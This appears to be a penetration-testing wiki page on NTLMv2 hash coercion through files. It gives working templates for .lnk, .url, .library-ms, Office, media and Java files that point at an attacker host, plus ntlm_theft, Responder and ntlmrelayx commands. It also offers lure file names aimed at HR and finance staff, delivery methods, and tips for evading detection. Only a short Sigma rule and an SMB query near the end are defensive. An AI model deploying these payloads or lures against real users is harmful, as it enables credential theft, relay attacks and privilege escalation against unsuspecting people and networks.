File-Based NTLMv2 Hash Coercion¶
How It Works¶
When Windows Explorer, Office, or other applications encounter a file containing a UNC path (e.g., \\attacker_ip\share), Windows automatically attempts to authenticate to that path using the current user's NTLM credentials. This happens because:
- Windows sees a network resource reference
- SMB client initiates a connection to the target
- The SMB server (attacker's Responder) requests NTLM authentication
- Windows automatically sends the NTLMv2 challenge-response — without prompting the user
The key insight: many file formats support referencing external resources via UNC paths in their metadata, icons, or content — and Windows processes these automatically when browsing, previewing, or opening.
Category 1: Browse-to-Folder (Zero-Click)¶
These file types trigger NTLM authentication just by the user browsing to the folder containing the file in Windows Explorer. No file needs to be opened or clicked.
.url — Internet Shortcut (URL Field)¶
The simplest and most reliable vector. Works on all current Windows versions.
Trigger: Explorer renders the file entry and resolves the URL.
.url — Internet Shortcut (IconFile Field)¶
Trigger: Explorer loads the icon for the file thumbnail. Even more reliable than URL field — fires during Explorer's icon cache population.
.lnk — Windows Shortcut (Icon Location)¶
# Generated with PowerShell
$shortcut = (New-Object -ComObject WScript.Shell).CreateShortcut("payload.lnk")
$shortcut.TargetPath = "C:\Windows\System32\cmd.exe"
$shortcut.IconLocation = "\\ATTACKER_IP\share\icon.ico"
$shortcut.Save()
Or using ntlm_theft:
Trigger: Explorer resolves the shortcut icon from the UNC path. Fires when folder is browsed.
LNK files are the most operationally useful
Unlike .url and .scf, LNK files are commonly found in shared folders and don't raise suspicion. Name them something like Meeting Notes.lnk or Important - Q4 Budget.lnk.
.scf — Shell Command File¶
Trigger: Explorer renders the folder and resolves the icon.
Patched on Modern Windows
Microsoft patched SCF icon resolution in Windows 10 1703+. Works on older systems and some enterprise Windows Server versions.
desktop.ini — Folder Customization¶
Place this in a folder with the System/Hidden attributes set:
Trigger: When any user browses to the parent folder, Explorer reads desktop.ini to customize the folder's appearance.
Patched on Modern Windows
Largely blocked on Windows 10/11 with recent patches. Still works on some unpatched Server editions.
.library-ms — Windows Library Definition (CVE-2025-24071)¶
This is the most dangerous modern vector — zero-click, works on latest Windows, and triggers just by extracting a ZIP/RAR archive.
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>Documents</name>
<version>1</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>\\ATTACKER_IP\share\icon.ico</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<simpleLocation>
<url>\\ATTACKER_IP\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Trigger: Windows Explorer automatically processes .library-ms files to generate previews and index metadata. When the file is extracted from a ZIP/RAR, the indexer processes it immediately — the user never needs to open or click it.
CVEs: CVE-2025-24054, CVE-2025-24071
Actively Exploited in the Wild
This technique was observed in phishing campaigns against Poland and Romania within days of disclosure. Attackers distributed ZIP files via Dropbox links containing .library-ms payloads.
.searchConnector-ms — Search Connector¶
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<iconReference>\\ATTACKER_IP\share\icon.ico</iconReference>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>\\ATTACKER_IP\share</url>
</simpleLocation>
</searchConnectorDescription>
Trigger: Same as library-ms — Explorer processes it to resolve the icon and location.
.theme — Windows Theme File¶
[Theme]
DisplayName=Corporate Theme
[Control Panel\Desktop]
Wallpaper=\\ATTACKER_IP\share\wallpaper.jpg
[Control Panel\Desktop\Colors]
Background=0 0 0
Trigger: Double-clicking the .theme file applies it, which triggers Windows to fetch the wallpaper from the UNC path.
CVE: CVE-2024-21320 (patched January 2024), but variants using BrandImage and other fields continue to emerge.
.diagcab — Diagnostic Cabinet¶
<?xml version="1.0" encoding="utf-8"?>
<dcmPS:DiagnosticPackage SchemaVersion="1.0"
xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007"
xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">
<DiagnosticIdentification>
<ID>Troubleshooter</ID>
<Version>1.0</Version>
</DiagnosticIdentification>
<DisplayInformation>
<Parameters>
<Parameter Name="Icon">\\ATTACKER_IP\share\icon.ico</Parameter>
</Parameters>
</DisplayInformation>
</dcmPS:DiagnosticPackage>
Trigger: Opening the .diagcab file or Explorer rendering its icon.
Category 2: Open Document¶
These require the user to open the file, but once opened the NTLM leak is automatic.
.docx — Microsoft Word (IncludePicture)¶
Create a Word document with an external image reference:
<!-- word/document.xml -->
<w:p>
<w:r>
<w:fldChar w:fldCharType="begin"/>
</w:r>
<w:r>
<w:instrText> INCLUDEPICTURE "\\\\ATTACKER_IP\\share\\image.png" \* MERGEFORMAT</w:instrText>
</w:r>
<w:r>
<w:fldChar w:fldCharType="end"/>
</w:r>
</w:p>
Trigger: Opening the document in Word. Word resolves the external reference.
.docx — External Template¶
Modify word/_rels/settings.xml.rels:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="\\ATTACKER_IP\share\template.dotx" TargetMode="External"/>
</Relationships>
Trigger: Word fetches the external template on document open.
.docx — Frameset (webSettings)¶
Modify word/webSettings.xml:
<w:webSettings>
<w:frameset>
<w:framesetSplitbar>
<w:w w:val="60"/>
</w:framesetSplitbar>
<w:frameset>
<w:frame>
<w:name w:val="main"/>
<w:sourceFileName r:id="rId1"/>
</w:frame>
</w:frameset>
</w:frameset>
</w:webSettings>
With the relationship pointing to \\ATTACKER_IP\share\page.html.
.xlsx — External Cell Reference¶
Creates an Excel file with a cell referencing an external data source via UNC path. When opened, Excel resolves the reference.
.rtf — OLE Object Link¶
{\rtf1
{\field{\*\fldinst { INCLUDEPICTURE "\\\\ATTACKER_IP\\share\\image.png" \\* MERGEFORMAT }}{\fldrslt}}
}
Or via objautlink / objdata OLE objects pointing to UNC paths.
.xml — Stylesheet (Opens in Word)¶
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="\\ATTACKER_IP\share\style.xsl"?>
<?mso-application progid="Word.Document"?>
<w:document xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml">
<w:body>
<w:p><w:r><w:t>Document Content</w:t></w:r></w:p>
</w:body>
</w:document>
Trigger: The mso-application processing instruction causes Windows to open this XML in Word, which then fetches the stylesheet from the UNC path.
.pdf — Adobe Acrobat Reader¶
PDFs can reference external resources via the /AA (Additional Actions) entry:
# Using pdf-NTLMLeaker or manual injection
# The PDF includes a GoToR or SubmitForm action pointing to \\ATTACKER_IP\share
Trigger: Opening in Adobe Reader. Reader shows a security dialog — if the user clicks "Allow", the connection is made.
Requires User Approval
Modern Adobe Reader asks the user before connecting to external SMB resources. This makes it less reliable for automated/zero-click attacks, but effective in targeted phishing where the document content motivates the user to click Allow.
.htm/.html — Image Source (Local File Only)¶
Trigger: Only works when opened from the local filesystem (not hosted on a web server). Chrome, Edge, and IE/Legacy Edge all resolve UNC paths in img src when the page is a local file.
Category 3: Media Files¶
.m3u — Playlist¶
Trigger: Opening in Windows Media Player (WMP). WMP attempts to access the track at the UNC path.
.wax — Windows Media Audio Redirect¶
Trigger: Opening in WMP. The redirect causes WMP to authenticate to the SMB path.
.asx — Advanced Stream Redirector¶
Same mechanism as .wax — WMP follows the redirect.
.m3u8 / .pls — Other Playlist Formats¶
Any playlist format that references file paths can be weaponized with UNC paths. VLC, Winamp, and other players may also resolve SMB paths.
Category 4: Java & .NET¶
.jnlp — Java Web Start¶
<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="\\ATTACKER_IP\share">
<information>
<title>App</title>
<vendor>Corp</vendor>
</information>
<resources>
<jar href="app.jar"/>
</resources>
<application-desc main-class="Main"/>
</jnlp>
Trigger: Opening with Java Web Start (requires Java installed). Java resolves the codebase UNC path.
.application — ClickOnce¶
<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity name="app" version="1.0.0.0"/>
<deployment install="true" mapFileExtensions="true">
<deploymentProvider codebase="\\ATTACKER_IP\share\app.application"/>
</deployment>
</asmv1:assembly>
Trigger: Must be downloaded via browser and opened. .NET ClickOnce resolves the codebase.
Category 5: Windows-Specific Special Files¶
.contact — Windows Contact¶
<?xml version="1.0" encoding="UTF-8"?>
<c:contact xmlns:c="http://schemas.microsoft.com/Contact"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<c:PhotoCollection>
<c:Photo>
<c:Value>\\ATTACKER_IP\share\photo.jpg</c:Value>
</c:Photo>
</c:PhotoCollection>
</c:contact>
Trigger: Opening the contact in Windows Contacts resolves the photo path.
.rdp — Remote Desktop Protocol File¶
Modern RDP files with remoteapplicationcmdline or icon references can also trigger SMB authentication.
Autorun.inf (Legacy — USB/CD)¶
Completely Disabled
AutoRun is disabled by default on all modern Windows for non-optical media. Only relevant for attacks against Windows XP/Vista or systems with AutoRun re-enabled.
Generation Tools¶
ntlm_theft (Greenwolf)¶
The gold standard — generates 21+ file types in one command:
# Generate ALL file types
python3 ntlm_theft.py -g all -s 10.10.14.5 -f Important_Meeting
# Generate only modern/working types
python3 ntlm_theft.py -g modern -s 10.10.14.5 -f Q4_Budget
# Generate specific type
python3 ntlm_theft.py -g lnk -s 10.10.14.5 -f Bonus_Payment
python3 ntlm_theft.py -g docx -s 10.10.14.5 -f Meeting_Notes
python3 ntlm_theft.py -g xlsx -s 10.10.14.5 -f Financial_Report
Manual LNK Generation (PowerShell)¶
$shell = New-Object -ComObject WScript.Shell
$lnk = $shell.CreateShortcut("$PWD\Important.lnk")
$lnk.TargetPath = "C:\Windows\System32\notepad.exe"
$lnk.IconLocation = "\\10.10.14.5\share\icon.ico"
$lnk.Save()
Manual URL File Generation¶
@"
[InternetShortcut]
URL=placeholder
IconIndex=0
IconFile=\\10.10.14.5\share\icon.ico
"@ | Out-File -Encoding ASCII "Important.url"
Library-ms Generation (CVE-2025-24071)¶
@"
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@shell32.dll,-34575</name>
<version>1</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>\\10.10.14.5\share\icon</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<simpleLocation>
<url>\\10.10.14.5\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"@ | Out-File -Encoding UTF8 "Documents.library-ms"
# Package into a ZIP for delivery
Compress-Archive -Path "Documents.library-ms" -DestinationPath "Documents.zip"
Capture Setup¶
Responder (Recommended)¶
# Start Responder to capture hashes
sudo responder -I eth0 -v
# Hashes are saved to:
# /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt
Impacket smbserver¶
ntlmrelayx (For Relay Instead of Capture)¶
# Relay captured NTLM to a target
impacket-ntlmrelayx -t ldap://dc01.corp.local -smb2support --escalate-user attacker
Operational Considerations¶
File Naming¶
Name files to match the target's context:
- HR department:
Salary_Review_2026.xlsx,New_Benefits_Package.docx - Finance:
Q4_Budget_FINAL.xlsx,Invoice_Approved.pdf - IT:
VPN_Setup_Guide.lnk,Security_Update_Required.url - Executive:
Board_Meeting_Agenda.docx,Confidential_Memo.rtf
Delivery Methods¶
| Method | File Types | Notes |
|---|---|---|
| Drop in shared folder | .url, .lnk, .scf, .library-ms | Zero interaction — anyone browsing triggers it |
| Email attachment | .docx, .xlsx, .rtf, .pdf | Requires user to open |
| Email with ZIP | .library-ms, .searchConnector-ms | Triggers on extraction (CVE-2025-24071) |
| USB drop | .lnk, .url, desktop.ini | Social engineering required |
| File share write (SMB) | Any browse-to-folder type | Best for internal pentests |
Avoiding Detection¶
- Use HTTPS listeners instead of SMB where possible (harder to block)
- Host the attacker listener on a legitimate-looking hostname
- Timing — drop files during business hours when SMB traffic is normal
- Clean up — remove coercion files after capturing hashes
Related CVEs¶
| CVE | File Type | Description | Patched? |
|---|---|---|---|
| CVE-2025-24054 | .library-ms | NTLM hash disclosure via Explorer processing | ✅ March 2025 |
| CVE-2025-24071 | .library-ms (ZIP) | Zero-click on extraction | ✅ March 2025 |
| CVE-2024-21320 | .theme | Theme file wallpaper UNC | ✅ January 2024 |
| CVE-2023-23397 | Outlook reminder | NTLM leak via PidLidReminderFileParameter | ✅ March 2023 |
| CVE-2023-35636 | Outlook calendar sharing | NTLM via calendar invite | ✅ December 2023 |
| CVE-2026-32202 | Multiple | NTLM credential theft (details TBD) | ✅ 2026 |
| CVE-2026-33829 | Snipping Tool URI | NTLM via URI handler | ✅ April 2026 |
Detection¶
Sigma Rule: Suspicious File in Shared Folder¶
title: Potential NTLM Coercion File Dropped in Share
status: experimental
logsource:
product: windows
service: security
detection:
selection:
EventID: 4663
ObjectName|endswith:
- '.scf'
- '.url'
- '.library-ms'
- '.searchConnector-ms'
- 'desktop.ini'
AccessMask: '0x2' # WRITE
condition: selection
level: high
Monitor Outbound SMB¶
// Detect outbound SMB to non-internal IPs
NetworkCommunicationEvents
| where RemotePort in (445, 139)
| where RemoteIP !startswith "10." and RemoteIP !startswith "172.16." and RemoteIP !startswith "192.168."
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort
References¶
- Greenwolf — ntlm_theft
- Checkpoint — CVE-2025-24054 In the Wild
- HackTricks — Places to Steal NTLM Creds
- Osanda Malith — Places of Interest in Stealing NetNTLM Hashes
- ired.team — Forced Authentication